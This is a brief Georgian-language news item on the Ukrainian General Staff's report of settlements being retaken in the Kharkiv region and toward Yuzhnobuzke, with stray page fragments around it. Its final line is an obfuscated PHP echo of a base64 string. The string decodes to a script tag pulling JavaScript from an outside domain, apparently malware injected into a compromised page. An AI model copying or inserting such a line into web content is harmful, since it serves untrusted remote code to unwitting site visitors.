celsiusi
ავერსი საქკაბელი
უკრაინის შეიარაღებული ძალები აგრძელებენ დასახლებების გათავისუფლებას ხარკოვის რეგიონში და იუჟნობუგსკის მიმართულებით - ამის შესახებ უკრაინის შეიარაღებული ძალების გენერალური შტაბის ოპერატიულ ინფორმაციაშია ნათქვამი.
 
მათივე ინფორმაციით, დღეს, საარტილერიო სროლის შედეგად, დამარცხდა ორი სამეთაურო პუნქტი, მოწინააღმდეგის ცოცხალი ძალისა და სამხედრო ტექნიკის კონცენტრაციის 8 უბანი
 
„ხარკოვის რეგიონში და იუჟნობუგსკის მიმართულებით რუსი დამპყრობლების მიერ დროებით ოკუპირებული დასახლებების გათავისუფლება გრძელდება. ჩვენი სამხედრო მოსამსახურეების უსაფრთხოების მიზნით, ოფიციალურ ინფორმაციას მოგვიანებით მოგაწვდით“, - წერია გენერალური შტაბის მიერ გავრცელებულ ინფორმაციაში.
 
ასევე ცნობილია, რომ დღის განმავლობაში, სახმელეთო ძალების მხარდასაჭერად, თავდაცვის ძალების თვითმფრინავებმა 17-ზე მეტი დარტყმა განახორციელეს მტრის ცოცხალი ძალისა, აღჭურვილობისა და საბრძოლო მასალების საცავებზე. უკრაინის საჰაერო თავდაცვის ნაწილებმა დნეპროპეტროვსკის ოლქის საჰაერო სივრცეში გაანადგურეს უპილოტო საფრენი აპარატი და ჩამოაგდეს Kh-59 თვითმფრინავის რაკეტა.
585
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");